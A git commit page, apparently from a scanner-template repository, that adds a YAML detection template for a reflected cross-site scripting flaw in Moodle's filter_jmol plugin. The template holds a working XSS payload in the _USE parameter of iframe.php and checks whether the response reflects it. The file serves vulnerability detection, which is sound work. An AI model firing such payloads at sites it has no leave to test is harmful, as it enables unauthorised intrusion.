Create Moodle filter_jmol XSS.yaml
parent
f5eddff072
commit
1b346644e7
|
@ -0,0 +1,19 @@
|
|||
id: Moodle filter_jmol XSS
|
||||
|
||||
info:
|
||||
name: Moodle filter_jmol XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "1337"
|
||||
part: body
|
Loading…
Reference in New Issue